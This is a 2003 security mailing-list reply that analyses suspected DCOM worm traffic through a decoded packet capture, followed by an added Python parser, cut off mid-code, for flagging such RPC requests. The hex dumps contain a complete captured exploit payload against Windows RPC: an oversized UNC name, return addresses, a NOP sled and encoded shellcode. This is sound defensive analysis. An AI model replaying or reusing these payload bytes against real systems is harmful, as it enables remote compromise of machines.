Full Disclosure mailing list archives
RE: DCOM
From: "Jason Coombs" <jasonc () science org>
Date: Mon, 11 Aug 2003 10:17:11 -1000
Is this what you're seeing?

6 66.859375 BEFC20000500 XEROX 000000 MSRPC c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0 67.30.174.214 WIN2KDEV IP

Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 8687500 microseconds
Frame: Frame number: 6
Frame: Total frame length: 126 bytes
Frame: Capture frame length: 126 bytes
Frame: Frame data: Number of data bytes remaining = 126 (0x007E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 126 (0x007E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070)
IP: ID = 0x1C04; Proto = TCP; Len: 112
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 112 (0x70)
IP: Identification = 7172 (0x1C04)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0138
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 92 (0x005C)
TCP: .AP..., len: 72, seq:3551092873-3551092945, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092873 (0xD3A96089)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xC46A
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 72 (0x0048)
MSRPC: c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 72 (0x48)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 0 (0x0)
MSRPC: Presentation Context List
MSRPC: Number of Context Elements = 1 (0x1)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Number of Transfer Syntaxs = 1 (0x1)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Abstract Interface Version = 0 (0x0)
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)

00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E.
00010: 00 70 1C 04 40 00 7D 06 01 38 43 1E AE D6 43 1E .p..@.}..8C.®ÖC.
00020: AB 39 0F 03 00 87 D3 A9 60 89 0B 3F 53 08 50 18 «9...?Ó©`?.?S.P.
00030: 1F E0 C4 6A 00 00 05 00 0B 03 10 00 00 00 48 00 .àÄj..........H.
00040: 00 00 7F 00 00 00 D0 16 D0 16 00 00 00 00 01 00 .....Ð.Ð.......
00050: 00 00 01 00 01 00 A0 01 00 00 00 00 00 00 C0 00 ...... .......À.
00060: 00 00 00 00 00 46 00 00 00 00 04 5D 88 8A EB 1C .....F.....]??ë.
00070: C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 É.?è..+.H`....

7 66.859375 XEROX 000000 BEFC20000500 MSRPC c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0 WIN2KDEV 67.30.174.214 IP

Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 7
Frame: Total frame length: 114 bytes
Frame: Capture frame length: 114 bytes
Frame: Frame data: Number of data bytes remaining = 114 (0x0072)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : BEFC20000500
ETHERNET: .......0 = Individual address
ETHERNET: ......1. = Locally administered address
ETHERNET: Source address : 000005000000
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 114 (0x0072)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 100 (0x0064)
IP: ID = 0x1E94; Proto = TCP; Len: 100
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 100 (0x64)
IP: Identification = 7828 (0x1E94)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFBB3
IP: Source Address = 67.30.171.57
IP: Destination Address = 67.30.174.214
IP: Data: Number of data bytes remaining = 80 (0x0050)
TCP: .AP..., len: 60, seq: 188699400-188699460, ack:3551092945, win: 8088, src: 135 dst: 3843
TCP: Source Port = Location Service
TCP: Destination Port = 0x0F03
TCP: Sequence Number = 188699400 (0xB3F5308)
TCP: Acknowledgement Number = 3551092945 (0xD3A960D1)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8088 (0x1F98)
TCP: Checksum = 0xEDFA
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 60 (0x003C)
MSRPC: c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind Ack
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 60 (0x3C)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 37081 (0x90D9)
MSRPC: Secondary Address
MSRPC: Secondary Address Length = 4 (0x4)
MSRPC: Secondary Address Port
MSRPC: Padding Byte(s)
MSRPC: Result List
MSRPC: Number of Results = 1 (0x1)
MSRPC: Reserved = 0 (0x0)
MSRPC: Reserved 2
MSRPC: Presentation Context Results
MSRPC: Result = Acceptance
MSRPC: Reason = Reason not specified
MSRPC: Transfer Syntax
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)

00000: BE FC 20 00 05 00 00 00 05 00 00 00 08 00 45 00 ¾ü ...........E.
00010: 00 64 1E 94 40 00 80 06 FB B3 43 1E AB 39 43 1E .d.?@.?.û³C.«9C.
00020: AE D6 00 87 0F 03 0B 3F 53 08 D3 A9 60 D1 50 18 ®Ö.?...?S.Ó©`ÑP.
00030: 1F 98 ED FA 00 00 05 00 0C 03 10 00 00 00 3C 00 .?íú..........<.
00040: 00 00 7F 00 00 00 D0 16 D0 16 D9 90 00 00 04 00 .....Ð.Ð.Ù....
00050: 31 33 35 00 00 00 01 00 00 00 00 00 00 00 04 5D 135............]
00060: 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 ??ë.É.?è..+.H`..
00070: 00 00 ..

8 67.281250 BEFC20000500 XEROX 000000 MSRPC c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690 67.30.174.214 WIN2KDEV IP

Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.827
Frame: Time delta from previous physical frame: 421875 microseconds
Frame: Frame number: 8
Frame: Total frame length: 1414 bytes
Frame: Capture frame length: 1414 bytes
Frame: Frame data: Number of data bytes remaining = 1414 (0x0586)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 1414 (0x0586)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 1400 (0x0578)
IP: ID = 0x1C05; Proto = TCP; Len: 1400
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 1400 (0x578)
IP: Identification = 7173 (0x1C05)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFC2E
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 1380 (0x0564)
TCP: .A...., len: 1360, seq:3551092945-3551094305, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092945 (0xD3A960D1)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x10 : .A....
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....0... = No Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0x9219
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 1360 (0x0550)
MSRPC: c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 1704 (0x6A8)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 229 (0xE5)
MSRPC: Bind Frame Number = 6 (0x6)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Allocation Hint = 1680 (0x690)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 4 (0x4)
MSRPC: Stub Data

00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E.
00010: 05 78 1C 05 40 00 7D 06 FC 2E 43 1E AE D6 43 1E .x..@.}.ü.C.®ÖC.
00020: AB 39 0F 03 00 87 D3 A9 60 D1 0B 3F 53 08 50 10 «9...?Ó©`Ñ.?S.P.
00030: 1F E0 92 19 00 00 05 00 00 03 10 00 00 00 A8 06 .à?...........¨.
00040: 00 00 E5 00 00 00 90 06 00 00 01 00 04 00 05 00 ..å............
00050: 06 00 01 00 00 00 00 00 00 00 32 24 58 FD CC 45 ..........2$XýÌE
00060: 64 49 B0 70 DD AE 74 2C 96 D2 60 5E 0D 00 01 00 dI°pÝ®t,?Ò`^....
00070: 00 00 00 00 00 00 70 5E 0D 00 02 00 00 00 7C 5E ......p^......|^
00080: 0D 00 00 00 00 00 10 00 00 00 80 96 F1 F1 2A 4D ..........??ññ*M
00090: CE 11 A6 6A 00 20 AF 6E 72 F4 0C 00 00 00 4D 41 Î.¦j. ¯nrô....MA
000A0: 52 42 01 00 00 00 00 00 00 00 0D F0 AD BA 00 00 RB.........ðº..
000B0: 00 00 A8 F4 0B 00 20 06 00 00 20 06 00 00 4D 45 ..¨ô.. ... ...ME
000C0: 4F 57 04 00 00 00 A2 01 00 00 00 00 00 00 C0 00 OW....¢.......À.
000D0: 00 00 00 00 00 46 38 03 00 00 00 00 00 00 C0 00 .....F8.......À.
000E0: 00 00 00 00 00 46 00 00 00 00 F0 05 00 00 E8 05 .....F....ð...è.
000F0: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC C8 00 ..........ÌÌÌÌÈ.
00100: 00 00 4D 45 4F 57 E8 05 00 00 D8 00 00 00 00 00 ..MEOWè...Ø.....
00110: 00 00 02 00 00 00 07 00 00 00 00 00 00 00 00 00 ................
00120: 00 00 00 00 00 00 00 00 00 00 C4 28 CD 00 64 29 ..........Ä(Í.d)
00130: CD 00 00 00 00 00 07 00 00 00 B9 01 00 00 00 00 Í.........¹.....
00140: 00 00 C0 00 00 00 00 00 00 46 AB 01 00 00 00 00 ..À......F«.....
00150: 00 00 C0 00 00 00 00 00 00 46 A5 01 00 00 00 00 ..À......F¥.....
00160: 00 00 C0 00 00 00 00 00 00 46 A6 01 00 00 00 00 ..À......F¦.....
00170: 00 00 C0 00 00 00 00 00 00 46 A4 01 00 00 00 00 ..À......F¤.....
00180: 00 00 C0 00 00 00 00 00 00 46 AD 01 00 00 00 00 ..À......F.....
00190: 00 00 C0 00 00 00 00 00 00 46 AA 01 00 00 00 00 ..À......Fª.....
001A0: 00 00 C0 00 00 00 00 00 00 46 07 00 00 00 60 00 ..À......F....`.
001B0: 00 00 58 00 00 00 90 00 00 00 40 00 00 00 20 00 ..X......@... .
001C0: 00 00 38 03 00 00 30 00 00 00 01 00 00 00 01 10 ..8...0.........
001D0: 08 00 CC CC CC CC 50 00 00 00 4F B6 88 20 FF FF ..ÌÌÌÌP...O¶? ÿÿ
001E0: FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ÿÿ..............
001F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 10 ................
00230: 08 00 CC CC CC CC 48 00 00 00 07 00 66 00 06 09 ..ÌÌÌÌH.....f...
00240: 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 10 00 ......À......F..
00250: 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 ................
00260: 00 00 78 19 0C 00 58 00 00 00 05 00 06 00 01 00 ..x...X.........
00270: 00 00 70 D8 98 93 98 4F D2 11 A9 3D BE 57 B2 00 ..pØ???OÒ.©=¾W².
00280: 00 00 32 00 31 00 01 10 08 00 CC CC CC CC 80 00 ..2.1.....ÌÌÌÌ?.
00290: 00 00 0D F0 AD BA 00 00 00 00 00 00 00 00 00 00 ...ðº..........
002A0: 00 00 00 00 00 00 18 43 14 00 00 00 00 00 60 00 .......C......`.
002B0: 00 00 60 00 00 00 4D 45 4F 57 04 00 00 00 C0 01 ..`...MEOW....À.
002C0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 3B 03 ......À......F;.
002D0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 ......À......F..
002E0: 00 00 30 00 00 00 01 00 01 00 81 C5 17 03 80 0E ..0.......Å..?.
002F0: E9 4A 99 99 F1 8A 50 6F 7A 85 02 00 00 00 00 00 éJ??ñ?Poz?......
00300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00310: 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 30 00 ..........ÌÌÌÌ0.
00320: 00 00 78 00 6E 00 00 00 00 00 D8 DA 0D 00 00 00 ..x.n.....ØÚ....
00330: 00 00 00 00 00 00 20 2F 0C 00 00 00 00 00 00 00 ...... /........
00340: 00 00 03 00 00 00 00 00 00 00 03 00 00 00 46 00 ..............F.
00350: 58 00 00 00 00 00 01 10 08 00 CC CC CC CC 10 00 X.........ÌÌÌÌ..
00360: 00 00 30 00 2E 00 00 00 00 00 00 00 00 00 00 00 ..0.............
00370: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC 68 00 ..........ÌÌÌÌh.
00380: 00 00 0E 00 FF FF 68 8B 0B 00 02 00 00 00 00 00 ....ÿÿh?........
00390: 00 00 00 00 00 00 86 01 00 00 00 00 00 00 86 01 ......?.......?.
003A0: 00 00 5C 00 5C 00 46 00 58 00 4E 00 42 00 46 00 ..\.\.F.X.N.B.F.
003B0: 58 00 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 X.F.X.N.B.F.X.F.
003C0: 58 00 46 00 58 00 46 00 58 00 9D 13 00 01 CC E0 X.F.X.F.X....Ìà
003D0: FD 7F CC E0 FD 7F 90 90 90 90 90 90 90 90 90 90 ýÌàý
003E0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
003F0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00400: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00410: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00420: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00430: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00440: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00450: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00460: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00470: 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 19 5E ë.^
00480: 31 C9 81 E9 89 FF FF FF 81 36 80 BF 32 94 81 EE 1Éé?ÿÿÿ6?¿2?î
00490: FC FF FF FF E2 F2 EB 05 E8 E2 FF FF FF 03 53 06 üÿÿÿâòë.èâÿÿÿ.S.
004A0: 1F 74 57 75 95 80 BF BB 92 7F 89 5A 1A CE B1 DE .tWu??¿»??Z.Î±Þ
004B0: 7C E1 BE 32 94 09 F9 3A 6B B6 D7 9F 4D 85 71 DA |á¾2?.ù:k¶×?M?qÚ
004C0: C6 81 BF 32 1D C6 B3 5A F8 EC BF 32 FC B3 8D 1C Æ¿2.ƳZøì¿2ü³.
004D0: F0 E8 C8 41 A6 DF EB CD C2 88 36 74 90 7F 89 5A ðèÈA¦ßëÍÂ?6t?Z
004E0: E6 7E 0C 24 7C AD BE 32 94 09 F9 22 6B B6 D7 4C æ~.$|¾2?.ù"k¶×L
004F0: 4C 62 CC DA 8A 81 BF 32 1D C6 AB CD E2 84 D7 F9 LbÌÚ?¿2.Æ«Íâ?×ù
00500: 79 7C 84 DA 9A 81 BF 32 1D C6 A7 CD E2 84 D7 EB y|?Ú?¿2.ƧÍâ?×ë
00510: 9D 75 12 DA 6A 80 BF 32 1D C6 A3 CD E2 84 D7 96 u.Új?¿2.Æ£Íâ?×?
00520: 8E F0 78 DA 7A 80 BF 32 1D C6 9F CD E2 84 D7 96 ?ðxÚz?¿2.Æ?Íâ?×?
00530: 39 AE 56 DA 4A 80 BF 32 1D C6 9B CD E2 84 D7 D7 9®VÚJ?¿2.Æ?Íâ?××
00540: DD 06 F6 DA 5A 80 BF 32 1D C6 97 CD E2 84 D7 D5 Ý.öÚZ?¿2.Æ?Íâ?×Õ
00550: ED 46 C6 DA 2A 80 BF 32 1D C6 93 01 6B 01 53 A2 íFÆÚ*?¿2.Æ?.k.S¢
00560: 95 80 BF 66 FC 81 BE 32 94 7F E9 2A C4 D0 EF 62 ??¿fü¾2?é*ÄÐïb
00570: D4 D0 FF 62 6B D6 A3 B9 4C D7 E8 5A 96 80 AE 6E ÔÐÿbkÖ£¹L×èZ??®n
00580: 1F 4C D5 24 C5 D3 .LÕ$ÅÓ

9 67.390625 BEFC20000500 XEROX 000000 TCP .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135 67.30.174.214 WIN2KDEV IP

Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.936
Frame: Time delta from previous physical frame: 109375 microseconds
Frame: Frame number: 9
Frame: Total frame length: 398 bytes
Frame: Capture frame length: 398 bytes
Frame: Frame data: Number of data bytes remaining = 398 (0x018E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 398 (0x018E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 384 (0x0180)
IP: ID = 0x1C06; Proto = TCP; Len: 384
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 384 (0x180)
IP: Identification = 7174 (0x1C06)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0026
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 364 (0x016C)
TCP: .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551094305 (0xD3A96621)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xDBD3
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 344 (0x0158)

00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E.
00010: 01 80 1C 06 40 00 7D 06 00 26 43 1E AE D6 43 1E .?..@.}..&C.®ÖC.
00020: AB 39 0F 03 00 87 D3 A9 66 21 0B 3F 53 08 50 18 «9...?Ó©f!.?S.P.
00030: 1F E0 DB D3 00 00 40 64 B4 D7 EC CD C2 A4 E8 63 .àÛÓ..@d´×ìͤèc
00040: C7 7F E9 1A 1F 50 D7 57 EC E5 BF 5A F7 ED DB 1C Çé..P×Wìå¿Z÷íÛ.
00050: 1D E6 8F B1 78 D4 32 0E B0 B3 7F 01 5D 03 7E 27 .æ±xÔ2.°³.].~'
00060: 3F 62 42 F4 D0 A4 AF 76 6A C4 9B 0F 1D D4 9B 7A ?bBôФ¯vjÄ?..Ô?z
00070: 1D D4 9B 7E 1D D4 9B 62 19 C4 9B 22 C0 D0 EE 63 .Ô?~.Ô?b.Ä?"ÀÐîc
00080: C5 EA BE 63 C5 7F C9 02 C5 7F E9 22 1F 4C D5 CD Åê¾cÅÉ.Åé".LÕÍ
00090: 6B B1 40 64 98 0B 77 65 6B D6 93 CD C2 94 EA 64 k±@d?.wekÖ?ÍÂ?êd
000A0: F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E ð!2??:òì?4r?.Ï.
000B0: 39 0B D7 3A 7F 89 34 72 A0 0B 17 8A 94 80 BF B9 9.×:?4r ..???¿¹
000C0: 51 DE E2 F0 90 80 EC 67 C2 D7 34 5E B0 98 34 77 QÞâð?ìgÂ×4^°?4w
000D0: A8 0B EB 37 EC 83 6A B9 DE 98 34 68 B4 83 62 D1 ¨.ë7ì?j¹Þ?4h´?bÑ
000E0: A6 C9 34 06 1F 83 4A 01 6B 7C 8C F2 38 BA 7B 46 ¦É4..?J.k|?ò8º{F
000F0: 93 41 70 3F 97 78 54 C0 AF FC 9B 26 E1 61 34 68 ?Ap??xTÀ¯ü?&áa4h
00100: B0 83 62 54 1F 8C F4 B9 CE 9C BC EF 1F 84 34 31 °?bT.?ô¹Î?¼ï.?41
00110: 51 6B BD 01 54 0B 6A 6D CA DD E4 F0 90 80 2F A2 Qk½.T.jmÊÝäð?/¢
00120: 04 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00 ..\.C.$.\.1.2.3.
00130: 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00 4.5.6.1.1.1.1.1.
00140: 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
00150: 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10 1.1...d.o.c.....
00160: 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00 ..ÌÌÌÌ ...0.-...
00170: 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C ..?*..........(?
00180: 0C 00 01 00 00 00 07 00 00 00 00 00 00 00 ..............

-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Paul Marsh
Sent: Monday, August 11, 2003 8:56 AM
To: Full-Disclosure (E-mail)
Subject: [Full-disclosure] DCOM

Looks like a worm has been released, check your logs.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
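The trace above is a DCE/RPC bind to interface 000001A0-0000-0000-C000-000000000046 (Frame 6, accepted in Frame 7) followed by a request with opnum 4 on that context (Frames 8 and 9) whose stub carries a UTF-16LE UNC server name that is not NUL-terminated, two 0x7FFDE0CC words, a long run of 0x90 and then shellcode. The parser below is an added example for this archive page, not code from the original post: it decodes the connection-oriented PDU headers, maps each request back to the interface its presentation context was bound to, and flags requests that look like the one captured. The byte strings are copied from the hex dumps above (the Frame 6 TCP payload in full; the Frame 8 request header plus the stub from frame offset 0x3A0 onward, trimmed, so the fragment is shorter than its declared 1704 bytes). The 32-byte NOP-sled cut-off and the "unterminated UNC name" rule are this example's own heuristics, not anything the post states.

```python
"""Decode the MSRPC (DCE/RPC connection-oriented) PDUs from the trace and
flag the opnum-4 request that carries the overflow payload."""
import struct
import uuid

PTYPE_REQUEST, PTYPE_BIND = 0x00, 0x0B
PFC_OBJECT_UUID = 0x80            # request header carries an object UUID after the opnum
ISYSTEM_ACTIVATOR = uuid.UUID("000001A0-0000-0000-C000-000000000046")  # bound in Frame 6
OPNUM_REMOTE_ACTIVATION = 4       # opnum of the Frame 8 request
NOP_SLED_THRESHOLD = 32           # heuristic cut-off chosen for this example

# Frame 6 TCP payload, copied from the hex dump (frame offset 0x36 onward).
BIND_PDU = bytes.fromhex(
    "05000b0310000000480000007f000000"
    "d016d016000000000100000001000100"
    "a001000000000000c000000000000046"
    "00000000045d888aeb1cc9119fe80800"
    "2b10486002000000")

# Frame 8: 24-byte request header (frame offset 0x36), then a trimmed stub excerpt
# (frame offset 0x3A0 onward). The real fragment is 1704 bytes and continues in Frame 9.
REQUEST_PDU_EXCERPT = (
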